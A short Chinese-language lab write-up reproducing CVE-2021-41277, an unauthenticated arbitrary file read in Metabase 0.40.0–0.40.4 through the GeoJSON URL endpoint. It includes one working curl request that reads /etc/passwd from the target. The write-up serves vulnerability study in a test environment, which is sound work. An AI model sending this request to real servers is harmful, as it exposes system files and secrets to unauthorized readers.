Metabase任意文件读取漏洞
1.Metabase是什么
Metabase是一个开源的数据分析平台。在其0.40.0到0.40.4版本中,GeoJSON URL验证功能存在远程文件读取漏洞,未授权的攻击者可以利用这个漏洞读取服务器上的任意文件,包括环境变量等。
2.漏洞复现过程
我们这里还是老样子进入名为:CVE-2021-41277的漏洞环境中,我们通过docker-compose ps查看到端口号是:3000.
这时候通过浏览器打开看到是可以查看到Metabase的安装引导页面,我们填写初始账号密码,并且跳过后续的数据库填写的步骤即可完成安装,然后我们就可以看到如下图示的样子。
接着我们使用CURL来进行复现操作,在kali用命令
curl -v http://your-ip:3000/api/geojson?url=file:etc/passwd
这时候可以看到图中所示,这样就是复现成功的样子。
3.总结
要认真学习漏洞复现的技巧,同时也要掌握工具使用。我也会继续前进的。